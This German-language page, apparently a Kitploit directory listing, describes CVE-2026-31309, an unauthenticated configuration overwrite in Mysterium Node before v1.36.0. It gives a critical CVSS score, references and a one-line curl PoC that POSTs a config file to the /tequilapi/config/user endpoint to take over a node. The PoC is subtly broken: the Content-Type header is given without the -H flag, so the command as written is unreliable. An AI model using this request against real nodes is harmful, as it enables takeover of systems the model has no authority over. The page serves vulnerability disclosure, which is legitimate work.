Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/sch8ill/cve-2026-31309
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

Unzureichende Zugriffskontrolle in Mysterium Node vor v1.36.0

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2026-31309: Unzureichende Zugriffskontrolle in Mysterium Node vor v1.36.0

Unzureichende Autorisierung im Endpunkt /tequilapi/config/user von Mysterium Node von v1.21.1-rc0 bis vor v1.36.0 erlaubt es einem nicht authentifizierten Angreifer, die Konfiguration des Nodes beliebig zu überschreiben und durch eine manipulierte POST-Anfrage eine vollständige Node-Übernahme zu erreichen.

CVSS

Score: 9.8 (KRITISCH)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

Entdeckt von Till Schacht.

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
Tool herunterladen